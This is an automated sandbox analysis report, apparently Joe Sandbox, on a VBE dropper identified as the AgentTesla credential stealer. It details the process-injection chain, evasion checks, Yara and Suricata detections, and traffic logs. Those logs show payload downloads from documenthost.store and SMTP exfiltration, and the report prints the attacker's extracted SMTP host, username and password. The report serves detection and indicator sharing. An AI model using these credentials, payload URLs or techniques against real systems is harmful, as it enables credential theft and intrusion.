Windows Analysis Report
Booking_0731520.vbe

Overview

General Information

Sample name: Booking_0731520.vbe
Analysis ID: 1554388
MD5: 134984e6d7545ba5eb30563498459f72
SHA1: 58ebeaa8da58484f3fcc371b436243e49e41d507
SHA256: 98b8949bd59e771f6e2cd4366783145ea645fe71d255e92462864551292113a9

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
AI detected suspicious sample
Injects a PE file into a foreign processes
Potential evasive VBS script found (sleep loop)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7252 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Booking_0731520.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 7604 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\PPJeBFdmEDGXlnL.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 8012 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\PPJeBFdmEDGXlnL.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 8092 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegSvcs.exe (PID: 3276 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • wermgr.exe (PID: 1632 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "8092" "2736" "2688" "2740" "0" "0" "2744" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
Source: dump.pcap; Rule: JoeSecurity_AgentTesla_1; Description: Yara detected AgentTesla; Author: Joe Security
Source: 00000008.00000002.3296808679.00000000030C4000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_AgentTesla_1; Description: Yara detected AgentTesla; Author: Joe Security
Source: 00000008.00000002.3296808679.0000000003091000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
Source: 00000008.00000002.3296808679.0000000003091000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_AgentTesla_1; Description: Yara detected AgentTesla; Author: Joe Security
Source: 00000008.00000002.3296808679.00000000030BC000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_AgentTesla_1; Description: Yara detected AgentTesla; Author: Joe Security
Source: 00000008.00000002.3294593134.0000000001152000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
Source: 8.2.RegSvcs.exe.1150000.0.unpack; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
Source: 8.2.RegSvcs.exe.1150000.0.unpack; Rule: JoeSecurity_AgentTesla_1; Description: Yara detected AgentTesla; Author: Joe Security
Source: 8.2.RegSvcs.exe.1150000.0.unpack; Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID; Description: Detects executables referencing Windows vault credential objects. Observed in infostealers; Author: ditekSHen; Strings:
  • 0x3347b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x334ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x33577:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x33609:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x33673:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x336e5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x3377b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x3380b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: amsi64_8092.amsi.csv; Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC; Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen; Strings:
  • 0xc137:$b2: ::FromBase64String(
  • 0xbda3:$s1: -join
  • 0xc14b:$s1: -join
  • 0x554f:$s4: +=
  • 0x5611:$s4: +=
  • 0x9838:$s4: +=
  • 0xb955:$s4: +=
  • 0xbc3f:$s4: +=
  • 0xbd85:$s4: +=
  • 0xe338:$s4: +=
  • 0xe3b8:$s4: +=
  • 0xe47e:$s4: +=
  • 0xe4fe:$s4: +=
  • 0xe6d4:$s4: +=
  • 0xe758:$s4: +=
  • 0xc55f:$e4: Get-WmiObject
  • 0xc74e:$e4: Get-Process
  • 0xc7a6:$e4: Start-Process

System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Booking_0731520.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Booking_0731520.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Booking_0731520.vbe", ProcessId: 7252, ProcessName: wscript.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 172.67.215.48, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7252, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
Source: Network Connection | Author: frack113 | Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 3276, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49983
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Booking_0731520.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Booking_0731520.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Booking_0731520.vbe", ProcessId: 7252, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\PPJeBFdmEDGXlnL.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 8012, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , ProcessId: 8092, ProcessName: powershell.exe

Timestamp                        SID      Severity  Classtype                      Source IP      Source Port  Destination IP  Destination Port  Protocol
2024-11-12T13:40:06.552482+0100  2022930  1         A Network Trojan was detected  4.245.163.56   443          192.168.2.5     49707             TCP
2024-11-12T13:40:45.748023+0100  2022930  1         A Network Trojan was detected  4.245.163.56   443          192.168.2.5     49920             TCP
2024-11-12T13:39:48.072675+0100  2028371  3         Unknown Traffic                192.168.2.5    49704        172.67.215.48   443               TCP
2024-11-12T13:39:49.557492+0100  2028371  3         Unknown Traffic                192.168.2.5    49705        172.67.215.48   443               TCP
2024-11-12T13:39:50.915029+0100  2028371  3         Unknown Traffic                192.168.2.5    49706        172.67.215.48   443               TCP
2024-11-12T13:40:04.633177+0100  2028371  3         Unknown Traffic                192.168.2.5    49709        172.67.215.48   443               TCP
2024-11-12T13:40:05.930252+0100  2028371  3         Unknown Traffic                192.168.2.5    49712        172.67.215.48   443               TCP
2024-11-12T13:39:42.481624+0100  2030171  1         A Network Trojan was detected  192.168.2.5    49983        162.254.34.31   587               TCP
2024-11-12T13:41:13.436879+0100  2855542  1         A Network Trojan was detected  192.168.2.5    49983        162.254.34.31   587               TCP
2024-11-12T13:41:13.436879+0100  2855245  1         A Network Trojan was detected  192.168.2.5    49983        162.254.34.31   587               TCP
2024-11-12T13:39:42.481624+0100  2840032  1         A Network Trojan was detected  192.168.2.5    49983        162.254.34.31   587               TCP

AV Detection

Source: 8.2.RegSvcs.exe.1150000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
Source: Booking_0731520.vbe | ReversingLabs: Detection: 25%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.5% probability
Source: unknown | HTTPS traffic detected: 172.67.215.48:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.215.48:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.215.48:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.215.48:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.215.48:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49981 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: Network traffic | Suricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.5:49983 -> 162.254.34.31:587
Source: Network traffic | Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49983 -> 162.254.34.31:587
Source: Network traffic | Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.5:49983 -> 162.254.34.31:587
Source: Network traffic | Suricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.5:49983 -> 162.254.34.31:587
Source: C:\Windows\System32\wscript.exe | Network Connect: 172.67.215.48 443
Source: global traffic | TCP traffic: 192.168.2.5:49983 -> 162.254.34.31:587
Source: Joe Sandbox View | IP Address: 104.26.12.205
Source: Joe Sandbox View | IP Address: 104.26.12.205
Source: Joe Sandbox View | IP Address: 162.254.34.31
Source: Joe Sandbox View | ASN Name: VIVIDHOSTINGUS
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | DNS query: name: api.ipify.org
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 172.67.215.48:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 172.67.215.48:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 172.67.215.48:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 172.67.215.48:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 172.67.215.48:443
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49707
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49920
Source: global traffic | TCP traffic: 192.168.2.5:49983 -> 162.254.34.31:587
Source: global traffic | HTTP traffic detected: GET /2910/s HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: documenthost.store
Source: global traffic | HTTP traffic detected: GET /2910/r HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: documenthost.store
Source: global traffic | HTTP traffic detected: GET /2910/E93ukvxugzIRTSVJZUqI.txt HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: documenthost.store
Source: global traffic | HTTP traffic detected: GET /2910/v HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: documenthost.store
Source: global traffic | HTTP traffic detected: GET /2910/file HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: documenthost.store
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 162.254.34.31 (13 occurrences)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (2 occurrences)
Source: global traffic | HTTP traffic detected: GET /2910/s HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: documenthost.store
Source: global traffic | HTTP traffic detected: GET /2910/r HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: documenthost.store
Source: global traffic | HTTP traffic detected: GET /2910/E93ukvxugzIRTSVJZUqI.txt HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: documenthost.store
Source: global traffic | HTTP traffic detected: GET /2910/v HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: documenthost.store
Source: global traffic | HTTP traffic detected: GET /2910/file HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: documenthost.store
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: documenthost.store
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: RegSvcs.exe, 00000008.00000002.3296808679.0000000003041000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000008.00000002.3294593134.0000000001152000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
Source: RegSvcs.exe, 00000008.00000002.3296808679.0000000003041000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3294593134.0000000001152000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
Source: RegSvcs.exe, 00000008.00000002.3296808679.0000000003041000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
Source: RegSvcs.exe, 00000008.00000002.3296808679.0000000003041000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/t
Source: wscript.exe, 00000000.00000003.2108425270.000001FE4E4BD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://documenthost.store/2910/E93ukvxugzIRTSVJZUqI.txt
Source: wscript.exe, 00000000.00000003.2247215022.000001FE4C763000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2249046009.000001FE4C763000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2247957240.000001FE4C763000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://documenthost.store/2910/file
Source: wscript.exe, 00000000.00000003.2247215022.000001FE4C763000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2249046009.000001FE4C763000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2247957240.000001FE4C763000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://documenthost.store/2910/filen
Source: wscript.exe, 00000000.00000003.2072048956.000001FE4C774000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2249173462.000001FE4C7F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2108425270.000001FE4E4BD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://documenthost.store/2910/r
Source: wscript.exe, 00000000.00000002.2249173462.000001FE4C7F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2057998960.000001FE4C745000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://documenthost.store/2910/s
Source: wscript.exe, 00000000.00000003.2221847721.000001FE4C723000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2072222190.000001FE4C723000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2058132166.000001FE4C723000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2209476075.000001FE4C723000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://documenthost.store/L
Source: wscript.exe, 00000000.00000003.2108162722.000001FE4C759000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2108624502.000001FE4C759000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2209476075.000001FE4C759000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://documenthost.store:443/2910/E93ukvxugzIRTSVJZUqI.txt
Source: wscript.exe, 00000000.00000003.2247957240.000001FE4C759000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2249046009.000001FE4C759000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2246918851.000001FE4C759000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://documenthost.store:443/2910/file
Source: wscript.exe, 00000000.00000003.2072048956.000001FE4C759000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://documenthost.store:443/2910/r
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | HTTPS traffic detected: 172.67.215.48:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.215.48:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.215.48:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.215.48:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.215.48:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49981 version: TLS 1.2

System Summary

Source: amsi64_8092.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 8.2.RegSvcs.exe.1150000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe | COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}
Source: C:\Windows\System32\wscript.exe | COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_02EAE270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_02EA4A98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_02EAAA12
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_02EA3E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_02EA41C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06B2A178
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06B36668
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06B35640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06B3B2A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06B3C200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06B33100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06B37DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06B37710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06B3E418
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06B32409
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06B30040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06B35D5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06B3001A
Source: amsi64_8092.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 8.2.RegSvcs.exe.1150000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winVBE@10/12@2/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\PowerShell
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8100:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_-399786117
Source: C:\Windows\System32\wermgr.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1632:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lqfx2iv5.p3l.ps1
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\PPJeBFdmEDGXlnL.vbs"
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe' (4 identical entries)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
